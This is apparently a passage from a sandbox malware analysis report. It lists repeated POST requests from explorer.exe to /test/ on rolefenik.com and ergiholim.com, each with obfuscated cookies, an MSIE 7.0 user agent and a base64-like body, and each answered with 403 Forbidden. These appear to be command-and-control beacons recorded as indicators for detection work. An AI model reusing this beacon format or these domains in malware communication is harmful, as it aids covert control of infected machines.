                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:18 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:18 UTC747INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:18 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hZkCJJz9GHb7NR2zmjo8DpZbGZClUPv7r6uth0raAbl2ijQpuhJLfIMkAn4D4Rm1%2Fld4v3esqTUXqlLt1TZfSIWrULQQBychNAqmdgp4iblnkEo5vq2t0sI9%2BbMjXcfB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2071716ed12cb2-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1540&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=1857601&cwnd=251&unsent_bytes=0&cid=1247669daad8c299&ts=394&x=0"
                                                                                                                                          2024-11-13 17:22:18 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          28192.168.2.650019104.21.15.1624434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:19 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:19 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:20 UTC744INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:20 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WH5Airkvd6EM7%2FL8EiezsrnbczJvlTaEFxVCvRBhsNDb0KMmvWHs3egnJa1MtE2W3iFHgpflnqDtJuSM0DzyeleOhuUTd7W8FoIixWSDFawxtopb7k7dhzfET8r2D0HQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20717a3d55f611-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=161599&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=16773&cwnd=32&unsent_bytes=0&cid=6608eb3e6b33cf5f&ts=811&x=0"
                                                                                                                                          2024-11-13 17:22:20 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          29192.168.2.650020104.21.92.1054434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:21 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:21 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:22 UTC758INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:22 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SrhKCms9rG%2FoJ%2B%2F9gGRAc00MgCaOhXMiMoizs0uOMxRFCwOVgK5hy%2Fq%2BMNerNqPMw8R%2B91XqU%2BS60k5sRHw7zL9FYy5UyPrthbT5DbwHns3kBhe%2FKzLtMWXur9OxHXWG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e207184aca71da7-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=137510&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=21048&cwnd=32&unsent_bytes=0&cid=3bba51ff7b12d286&ts=756&x=0"
                                                                                                                                          2024-11-13 17:22:22 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          30192.168.2.650021104.21.15.1624434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:23 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:23 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:23 UTC752INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:23 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nHYC3VgTFsavj47x5Ipq2yZSQTrs2q%2BhmAjDIjGnjkvL%2B1MjN0Pb9pm30O4X4QuSTBIioZKOovDW1oP7ZYcRoY1WTV5Zt0ZrqNTUUM4ep%2FBit0p%2FgOt%2BQdciG5HGwaxK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20718ec87cd761-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=134973&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=22055&cwnd=32&unsent_bytes=0&cid=5b8874c85e3848f9&ts=547&x=0"
                                                                                                                                          2024-11-13 17:22:23 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          31192.168.2.650022104.21.92.1054434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:24 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:24 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:25 UTC752INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:25 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2a1oFCT3lljdO7TIzVzNTehfzuohZWgRmd68L8poYRkSm2q%2F62yJdxR8x32WeAEuHDUdx05%2FpobZRlPwP0p%2BPZWY7nxmneM40a4rSDP0u%2FYT8z5Oth1lBquHxDjPiI5%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e207199ee15d75c-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=132863&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1167&delivery_rate=21475&cwnd=32&unsent_bytes=0&cid=dd1e6a571e8d3ab3&ts=747&x=0"
                                                                                                                                          2024-11-13 17:22:25 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          32192.168.2.650023104.21.15.1624434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:26 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:26 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:26 UTC749INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:26 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M1Br7FOZ151Tv30JiSJIA%2BG69PshIZ4krip%2ByRctCjYM7F7xrak0Lgeq18xYHGIFZynO2m6IuBlu2zMNakmI01SWLVI6vTaHouhlcVcN%2Bv1MJNV25QUJUDzMvyCssOTu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2071a20fed2cda-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1190&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=2399337&cwnd=251&unsent_bytes=0&cid=d6a04af6bf06d8e1&ts=445&x=0"
                                                                                                                                          2024-11-13 17:22:26 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          33192.168.2.650024104.21.92.1054434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:27 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:27 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:28 UTC754INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:27 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mgN0FB79osoJyRci%2FeCvE1W7OI%2B%2F6ihZO%2FePWO0VnjQcFYBRypV436ZfXkKOC5CPZwhl49g8PjWsbGF%2BxZqLoZ3cMRqwBIdl37fY%2Bg0HMOYaVWfbqzdNxdd058WX5muj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2071aaf830d788-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=140398&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=20792&cwnd=32&unsent_bytes=0&cid=eb26554afb95e4d0&ts=524&x=0"
